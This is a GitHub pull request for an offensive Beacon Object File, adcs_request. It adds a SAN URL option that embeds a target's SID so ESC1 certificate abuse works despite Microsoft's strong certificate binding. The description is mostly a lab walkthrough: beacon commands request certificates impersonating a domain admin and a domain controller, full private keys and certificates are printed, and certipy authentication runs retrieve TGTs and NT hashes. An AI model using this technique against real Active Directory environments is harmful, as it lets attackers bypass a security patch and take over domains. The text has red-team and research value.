Skip to content

adcs_request: allow embedding a SAN URL entry to satisfy strong certificate binding requirements #40

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 4 commits into
base: main
Choose a base branch
from
Open

adcs_request: allow embedding a SAN URL entry to satisfy strong certificate binding requirements #40

wants to merge 4 commits into from

Conversation

martanne
Copy link

With recent Microsoft patches strong certificate binding is enforced.

This pull request adds a new option to the adcs_request BOF which allows to specify an URL entry to be added to the SAN. This allows to add the target's SID using the Microsoft specific prefix (tag:microsoft.com,2022-09-14:sid:) to satisfy strong binding requirements.

All commands below were run in a Ludus lab with the ADCS role applied.

Behavior before the proposed changes, try to abuse ESC1:

beacon> exec_bof ZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn)       : domainadmin@ludus.domain
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAl1p42cnTk7232wFD0B4Kmd8n10IoDid/qeNIDAulOjuUg6pw
mJCS6AtoCCyluQWqC4kCOq5GAmvq8CoQbzs24LbVpdaFRBbnZL1shjqgfEqWGUin
v1E8becFDz4a3X1Go257rHyvya07uUy0gV4r8qcRLL1nuD2lVVe8hqQC1PRrA4Ed
ukWbi1RDobwtpmlu1emhXc0YVx6s4czSIJxsyn1Ywx6RnFjw5zHXeTA42DNZCy7X
czDfednzyZfDLNx82I7hwzvuWu2Llp/ZjAWm2Q36lmgWNx/PXXL+tAhLbcUHEbiE
zTPbcmQeInRCtjXcyAyawo5SzZ9wAy0FpCDJcQIDAQABAoIBAF0KSaYf8ocspfvk
ECq8fOnQC27BBVyGHW1zARQeiIh+nbI+sQ6oORaaBG6Z+5n8iGak55DpFrJgYsEW
Kpol/XswCa/zamLL7Zy48SCmo4ckVpbeWfg62Pn6fNq848jqPOU0gqQq1ekVK9Sh
+YhZOozk9KLbIApbIuqOj5747aC4WZOF2Cg6uXjdDXCZyOHYCm3DLJqKjnshnMLL
hWnKII1oAtPwhPGlQrjKMBfHAb7ibBHICZftGoka2xCdWakx/0aWXcvBFptwzR6N
30tH07jM21ZpW214cbelW+ZDwD2Mdj2wK8SEMKNbgzRNc4zX7cMKaH60rFzbLjAP
2VB4ZN0CgYEAwfUc76Tgu8mTv6qxEiUhdYrgzpioBK1ypiFQB5b4VjWKqdWeylwM
aujDK/yqur1WHzD9AnKaLp637gK3E2qasG7E4A7ro8HXtCYOzTTVIpbigZx6TGBJ
s1OuyAC3SeGBGIFIy4hIHgsTckhnHV4SrZsyTDL4nU6t/yoycdByV8cCgYEAx8ST
a7OoXBidCXKpHPGGoGPM1DvBUz847F9GpNkCq+APUjX87dpnmoMOQvTmEeV8b5pb
i90BgWgDk9iAjip783a1ujDq/lXcBO28Wr2DhjSOFFIeBPfSqgu+AH/v2a2vYUEC
k9gAD23b9NISiQymgCftUNxGaxHXQqflq0dqhQcCgYAcJp9UiPG1T8SKBRQ+NfVt
QgLu+WkphKMnSZ57+4V/vbWqgL7TUBjdS3tIXxvIjsJ5NHsEZ+3I5nB7sxkvUEGz
aeBZRNEeq3vLQdrUHd7xbkTh2vxFKZSI2pR7ot73cityixEtuVH+Sk1AQRH2STkc
yXG7bYp4CntmlZFMw5xU8QKBgQCLasuf/NBhBeSC9XzE8GMOiNgovlNb7+GgRZYd
8j4FCehnbbpJnYV0tkY7wILYtpozoTyGzgUA9UCZ7B08GrZK4exON1mpiu50mh48
Dcs+3GrUD8NXoEVr26oM2zzfZHHjo+VSnQrducQqhnndH/ELu9HJ/xE+JENhB6An
+z2B/QKBgFHk5sOOf2CcuxVaxyiaIjMzJfsRPTZzaVia8Mtb7VJCYeRweKwIs960
6cM7aBsW71ldNzVzPBE2h74KgSJ2I37p7YHg/zq2pqza8pwX0EYb9eUGr2WcE4T1
i7do61PChr/eEz61t37yOqnyx4bDErxVuS9vwE4QEforZ+6oQxQu
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFrTCCBJWgAwIBAgITFAAAAA96bMPlCme0xQAAAAAADzANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4MzEyOFoXDTI2MDkyMTE4
MzEyOFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJdaeNnJ05O9t9sBQ9AeCpnfJ9dC
KA4nf6njSAwLpTo7lIOqcJiQkugLaAgspbkFqguJAjquRgJr6vAqEG87NuC21aXW
hUQW52S9bIY6oHxKlhlIp79RPG3nBQ8+Gt19RqNue6x8r8mtO7lMtIFeK/KnESy9
Z7g9pVVXvIakAtT0awOBHbpFm4tUQ6G8LaZpbtXpoV3NGFcerOHM0iCcbMp9WMMe
kZxY8Ocx13kwONgzWQsu13Mw33nZ88mXwyzcfNiO4cM77lrti5af2YwFptkN+pZo
Fjcfz11y/rQIS23FBxG4hM0z23JkHiJ0QrY13MgMmsKOUs2fcAMtBaQgyXECAwEA
AaOCAogwggKEMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBQ8tDRvAF0rgROmcuAxwPNEr75FeDAzBgNVHREELDAqoCgGCisGAQQBgjcU
AgOgGgwYZG9tYWluYWRtaW5AbHVkdXMuZG9tYWluMB8GA1UdIwQYMBaAFHSyXjgR
sNMXlg+5A0J6Gw0eJ+GaMIHNBgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8v
L0NOPWx1ZHVzLUNBLENOPUVEUi1EQzAxLTIwMjIsQ049Q0RQLENOPVB1YmxpYyUy
MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
bHVkdXMsREM9ZG9tYWluP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9v
YmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYIKwYBBQUHAQEEga4w
gaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1sdWR1cy1DQSxDTj1BSUEsQ049
UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJh
dGlvbixEQz1sdWR1cyxEQz1kb21haW4/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVj
dENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggEB
AFpiF1GtO49fvrB6AMHP+qGmeCtX1W8fRfBAmsSmN7uKb/798b96NLVyI654n7kB
8NskfI6QAeOHpLV05/0I7QOhJt4wdHpuhcqPDDQB7Q2Z6pGs39mNlP81DxxNvMfu
WzH+p1dUQS4fxTYgk7YQuMdN+smYGpvTMYGo4cjmVABffq6+CGlXn9NOm0AYfyP3
uajlInI9rs0MxMyLB2nmb78BgfbuvC6UFUzcTXwN6x1vj7T0FynZH3yJEIsa3P7x
NzeVdNK43r4QBm5xxcmztu0rsjF9tlfpsy1FRzJtO5ALsIuDVEXE54Pl5uDKuE7v
l8URfXY4eQ9zhpS53e+iyOQ=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Show the SAN of the requested certificate:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain

Authentication fails because strong certificate binding is not satisfied:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'domainadmin'
[-] See the wiki for more information

Instead, request a certificate using the patched BOF and supply the targets SID in a Microsoft specific SAN URL entry:

beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn) : domainadmin@ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAp7vE3cGPFlO1yuaQ77PccOcD798h2u27tqodO5Zs+eYqdzEC
IepNdCTPCWHZ8/V9phk278/2bMilYc6QMXP3MIXT8N4RoC+7de35OZLFCSd+fzpF
ZE6Fcj8bLoTwx/tUCCXo80i+u6vwu1iP/8LI+iIBVp98e1eAzZSuDMP6gcqBQv4L
4hvkoRWD6vCfXpmTEk7RwgsXDdXFc4W4AMz28kHXthr+fT01ijmfmbzULMeJ7gAp
yhAW5iueqcyKa4UpFY5M+CQR6j01FfaOaHGNn+XWEJg6b/JJTONnPSYJa6PfW1NB
exEM9S3c3CukOEMJ8Aip2/ySRf4K/tCuyavEdQIDAQABAoIBAFoQctb39dLxQ+4c
+7oaA8YD5ZNJZq5ddKvSkDvMu9s7gZXalOCNJOW2Vg0do6BhMwSbCWqfahxjaJoq
Bjbno9VEJtdxBlnTB399NpN5gZ82u6+pJFWF7BW6WOgTrg5Tn314jasEZpXy7yJJ
nZihiLT2yW0v2fGIvLqmmQZ1vO8vZKGYkfwaXp+2rBHQPV5w5v03IHDIse/A2cdq
6mru7Ar61LPpc3cTu4+Qgb/Of+JTd6Fn2Zt/Rdk7J1f8mSgKqgGDSQxiz5ohzfNH
G4WlfOJ0BmfGdm5VgNr3tZBIc5ZnyRxoxrpgW+b9lBHWXHEmlQF7iaE8uRn0AwQt
v9dNQMkCgYEA113p0pXYTpiGPccvPxfdy0y97cMH+RTbYCcAprDP1RlAmiK0l6KM
yLPQWDTl9c/Om6aEff8+RWPB0qnPm67ZsKr3Hk+po/wP4kkvoWEoHUU8geGHnImU
7GFGy0zZwmV0xhEUnC2TKmT2m2l71lmopwCd0O35rLhYW13i7RJ81P8CgYEAx2Ex
WurHeQkWrIz5ynCPxaHRGbbAK0+wG+E2JuBEbsHsP27HDyj4xo4vxPRehEQgXEhF
xaMXw1WfUhSmG1sdulqTnRAShC80FqEmUlxhS908xKOZzakNn2Ejo9bSTyaxO9vB
holXQPr4TnHtUVuTmu+lbjPvHxAa8txjKD0l4osCgYEAkpp3RMaEDFx/ZSZl3wkc
DfwbffI5RzEPdJCYPOA3WdRqyYG+dUpNk4Hz3VeFAqOG/SWJI0vQ0+NoWUMG8+8+
eKiot5V64QoAtgUjyzMb33D2E2O2sLRnD9HYIyQZR99QclPGN9o+R6maxYg0qGE4
ERa2Vzbnss96NhffFYp0N3kCgYBTL+o31N2FUpVzSR6vqGdUPj/QSr/DUmxYNY8y
iUAENkUr8jx7xsyFi63Cr3MAHKyj1EPIQlQX3BGtXZAwucOdjU0pqxsOq+M/zdz/
YCv4S0afhOMXPAHDDfSg13DINYydPQNx7rvJEO2pTT+HQn5DltmfMWwDueSEkA+P
KnQ0IQKBgQCHxyN1gT4Csc0VziLKR5bp+DVrJduF5YrmrfAlhNjbcigCFrkMv2KE
k7JmLo7gXiLlRyHeC2SI2c2AjvER0fyXeru1E7qcUuDizr+f4zU68K+WnD82Vwor
lVxJp37+B0aFZ6K8B/uRRNm9e2dEDvvxBhxuLijObKZGC5eYwQpNQg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIF/jCCBOagAwIBAgITFAAAABGkLoNsUAu5IgAAAAAAETANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4NDAyMFoXDTI2MDkyMTE4
NDAyMFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKe7xN3BjxZTtcrmkO+z3HDnA+/f
Idrtu7aqHTuWbPnmKncxAiHqTXQkzwlh2fP1faYZNu/P9mzIpWHOkDFz9zCF0/De
EaAvu3Xt+TmSxQknfn86RWROhXI/Gy6E8Mf7VAgl6PNIvrur8LtYj//CyPoiAVaf
fHtXgM2UrgzD+oHKgUL+C+Ib5KEVg+rwn16ZkxJO0cILFw3VxXOFuADM9vJB17Ya
/n09NYo5n5m81CzHie4AKcoQFuYrnqnMimuFKRWOTPgkEeo9NRX2jmhxjZ/l1hCY
Om/ySUzjZz0mCWuj31tTQXsRDPUt3NwrpDhDCfAIqdv8kkX+Cv7QrsmrxHUCAwEA
AaOCAtkwggLVMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBQJ9vNq12rZ9proCgjafosHPvtzVTCBgwYDVR0RBHwweqAoBgorBgEEAYI3
FAIDoBoMGGRvbWFpbmFkbWluQGx1ZHVzLmRvbWFpboZOdGFnOm1pY3Jvc29mdC5j
b20sMjAyMi0wOS0xNDpzaWQ6Uy0xLTUtMjEtNzEyOTgwNDkzLTE1MDMwMzQ2OTMt
MzU2NTA1OTMzMS0xMTA1MB8GA1UdIwQYMBaAFHSyXjgRsNMXlg+5A0J6Gw0eJ+Ga
MIHNBgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWx1ZHVzLUNBLENO
PUVEUi1EQzAxLTIwMjIsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bHVkdXMsREM9ZG9tYWlu
P2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxE
aXN0cmlidXRpb25Qb2ludDCBuwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAC
hoGbbGRhcDovLy9DTj1sdWR1cy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIw
U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1sdWR1cyxE
Qz1kb21haW4/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
YXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggEBAGjSpnSHxnBFcsIGaNDs
cgDgzkt2Ub0waKgW1Z1HwUoQbZH9TUR0E25fvvHmnkCSh/7zlV/faKlP2Qp8x1+5
LX9Mx+F9hRrIofsDH0DGvUkKFxBTpXRxV5QxeAinBWEs+6fKt/6YKpVWPa+b6nMu
+/cknuzHa6yuKnA2nSRj2rvVTVuXFDoOVrDFAxWKP/iYS1G1SN8zXczUhvY8jCoy
LAV4rX2uiro2EgkrWUZgSSHicYkT2EVYugKgFJKgOTLwa2V6IxJIJLthq1Axmwt2
XhtmpNGn80YfHHaFtts5wfPm/hygrPfLd0B48Jc4wU2lHhFUpQr/0R6ZzJA0/yLs
6qc=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Verify that the resulting certificate contains the expected SAN entries:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105

This time authentication succeeds:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1105'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'domainadmin.ccache'
[*] Wrote credential cache to 'domainadmin.ccache'
[*] Trying to retrieve NT hash for 'domainadmin'
[*] Got hash for 'domainadmin@ludus.domain': aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

The changes were also tested for machine accounts:

beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" EDR-DC01-2022.ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001 0 0 0 1
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (dns) : EDR-DC01-2022.ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAy7FIZH0FnItZqZXCk6CJzFkj/8jYrKnNVEjfMG4O47A6Dtlv
y5PuNxL2fzAs93kK2NB7dSYvXKFNcXHHgoOK7Fb9FZFsx02iMsqNuknhBwm2S7Uo
P3QzNCmn+HGlzVTVDL8TbmADKNRRyadGN9AmI3mStHSCOyc624YFLpE7l6IvzMCI
5VQIAk7FfWHONabnwbSB4d1cgmexkwqNagyKbSjVfFs5vmRhgYul9cxvFzfjJSNC
jMOb4zzJ4FYWVeTYz32KL0U1+Cz4WyUoVTXFzYGqx+pky3l8rdnLZS8Pukw59mPv
/1b/RXmYAJhqy+78u33GE4cehF76/7hRXRaf6QIDAQABAoIBAEyHlCplKqmRVaO4
p71tkLhdOYBNxtLAjWvAYVLB1whG2tlfanhzYQoCLujEgfCM4r1pPylZqmvEEuOv
mwT3RUfcuwPSeqs7CNjKb4txXIGXbY1uR+vnTaGokPpwQJov6Ef8tmE+45EAjKYW
GfS4WMv1TmBMce2lpKB77xB68ofadT58aTrXL+He/xqzFMqUzLfbBJ8AHExO9XQ8
0mwX8KI753lJ/BHWucX6Tm07ZoiVmYdpePrxW9at6CElJn3OgeDoaPoTac7sIaoj
z+VuRx9ckHb3OMFWuSIe/4HM5a9C5LwAglujyxCVjKRcOxCDoGdSIMM0cHjU3MGs
9mioAH0CgYEA5v8qPW4EOmSiVYaFU6Bs3AVIRInd5mShsd8nbXhQ9Fj2yPEDiHk1
RuXbrecZuSxan91ea4q6YUSZHuYl9UfMSjao026J1xOK2ry21sKgG1w+DJibCCNr
3wsibwwrxwlslqhcL1bBDlkQHRLqt8EP0/5TWW4xBVhL32LTMr3JtjMCgYEA4b2H
E6yfQh8lX30SRu9ppkxWfA6UHzSKKvYvQ5MuPqvbskRb45evQju+umtwbv2hDcnt
HOlfES1+aGVQRPSiW/iCb1e7EgQK5hY6ZZAmZMb/z9hAJ4M+XIMD3TfKeIuwTSh8
JrY5hvSefbSPVhu3vEJqb8BDC1zHtEtgcgTSHXMCgYEAx9auO1DHVaEkE2t6QrvC
EaJ8P9cp4pziihgtavYwywOAFJz1WobJwZkvsMYCqgEmMbF4cv8keOu4sFOZORax
NO8OpUO2+huM/+lNIIRlsOXfRFRtot/J/b8LPhjAcsPDbp8eiVG7WOdSGmT4LJpY
UCVxBChhPmeB1DMR1Y79R6MCgYBRwEeI0n0ifxET0cGqus1yEjdH2ie+XVKkWF+p
g0W+IJMBrkvw0mAABo7+CCbBq0yGJ9idHc7185nRyM8XCdk6oXbrR8RRs/EWfnpL
iba9zGucI96n8JnG+xONK8VBfqUsbDr58ghHXZOARsGaF5OktBDDw8cD+GfCXYHi
COjnDQKBgCaMfEtR5jddBa3da+fdXNzlSzGnyQALaHm4fK9xdD79Zdm8uHvq9JX2
ztO42OBpUXmA4/KxsB/89W+B4EYsKujmFG2+5w/ZhAeuxzcg6HvkQ/oQ9fgPJaQm
XTYUcLKkYoSrxk2PKOAzEuI8PfNOPDog7gNVC8vTOxN6S8BKAB22
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIF7zCCBNegAwIBAgITFAAAABLbNxrC91vWaQAAAAAAEjANBgkqhkiG9w0BAQsF
ADBCMRYwFAYKCZImiZPyLGQBGRYGZG9tYWluMRUwEwYKCZImiZPyLGQBGRYFbHVk
dXMxETAPBgNVBAMTCGx1ZHVzLUNBMB4XDTI1MDkyMTE4NTE0NFoXDTI2MDkyMTE4
NTE0NFowVDEWMBQGCgmSJomT8ixkARkWBmRvbWFpbjEVMBMGCgmSJomT8ixkARkW
BWx1ZHVzMQ4wDAYDVQQDEwVVc2VyczETMBEGA1UEAxMKZG9tYWludXNlcjCCASIw
DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMuxSGR9BZyLWamVwpOgicxZI//I
2KypzVRI3zBuDuOwOg7Zb8uT7jcS9n8wLPd5CtjQe3UmL1yhTXFxx4KDiuxW/RWR
bMdNojLKjbpJ4QcJtku1KD90MzQpp/hxpc1U1Qy/E25gAyjUUcmnRjfQJiN5krR0
gjsnOtuGBS6RO5eiL8zAiOVUCAJOxX1hzjWm58G0geHdXIJnsZMKjWoMim0o1Xxb
Ob5kYYGLpfXMbxc34yUjQozDm+M8yeBWFlXk2M99ii9FNfgs+FslKFU1xc2Bqsfq
ZMt5fK3Zy2UvD7pMOfZj7/9W/0V5mACYasvu/Lt9xhOHHoRe+v+4UV0Wn+kCAwEA
AaOCAsowggLGMD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIXPuyKB9eBwh5WL
PITb0DiHpIYnf4zL7CGL8uAHAgFkAgEEMBMGA1UdJQQMMAoGCCsGAQUFBwMCMA4G
A1UdDwEB/wQEAwIHgDAbBgkrBgEEAYI3FQoEDjAMMAoGCCsGAQUFBwMCMB0GA1Ud
DgQWBBRxFjtdG+3MzcCUgsFxkzqY4a5tITB1BgNVHREEbjBsghpFRFItREMwMS0y
MDIyLmx1ZHVzLmRvbWFpboZOdGFnOm1pY3Jvc29mdC5jb20sMjAyMi0wOS0xNDpz
aWQ6Uy0xLTUtMjEtNzEyOTgwNDkzLTE1MDMwMzQ2OTMtMzU2NTA1OTMzMS0xMDAx
MB8GA1UdIwQYMBaAFHSyXjgRsNMXlg+5A0J6Gw0eJ+GaMIHNBgNVHR8EgcUwgcIw
gb+ggbyggbmGgbZsZGFwOi8vL0NOPWx1ZHVzLUNBLENOPUVEUi1EQzAxLTIwMjIs
Q049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENO
PUNvbmZpZ3VyYXRpb24sREM9bHVkdXMsREM9ZG9tYWluP2NlcnRpZmljYXRlUmV2
b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2lu
dDCBuwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1s
dWR1cy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1sdWR1cyxEQz1kb21haW4/Y0FDZXJ0
aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkw
DQYJKoZIhvcNAQELBQADggEBAEWonUydh4kAIQCT9gQdoNTFIIOj3Ve+hhLlp8nz
UV8qERO+2vmyqKeBTZT7vKWlzvBGWSJ3YkDKi/0A2FJz3HmnBjQLMQAr6xAPAjLL
szxKJaFHyiG5WvshZxztYOQemB4x4/zOvDeC5DK+DMap7+Oq34F83K2C0YGRZKH6
mhh8dzDb6Nw4C5LLa7UoxMq2wStB9XvWlgO2Q+0e1YxXLoPMCVWfIgVs/zlng20o
rBJzqBtH0lgUSZEfg11xBLCtvY8Pt5vsi4t7PBoiD/EnDzx81NtBzsCdnMyH6Afz
FoXcyZqZBa44Evg4NjR9dW+NnqV/qtNHjeOxNEN6qie507s=
-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Show resulting SAN:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                DNS:EDR-DC01-2022.ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001

Authenticate:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'EDR-DC01-2022.ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1001'
[*] Using principal: 'edr-dc01-2022$@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'edr-dc01-2022.ccache'
[*] Wrote credential cache to 'edr-dc01-2022.ccache'
[*] Trying to retrieve NT hash for 'edr-dc01-2022$'
[*] Got hash for 'edr-dc01-2022$@ludus.domain': aad3b435b51404eeaad3b435b51404ee:2ee4f54dcf70284ea79926af1e28c602

@martanne
adcs_request: fix standalone/test build
8763783
@martanne
adcs_request: properly align output
2c1cc3c
@martanne
adcs_request: reorder SAN creation code
c6b64f3 
No functional changes, solely in preparation for further SAN etnries.
@martanne
adcs_request: support embedding a SAN URL
ac9a64a 
This allows to specify the alternate subject's SID through a SAN URL
entry to satisfy strong certificate binding requirements.

The new parameter should have the following format where the SID is
adapted as needed.

 tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@martanne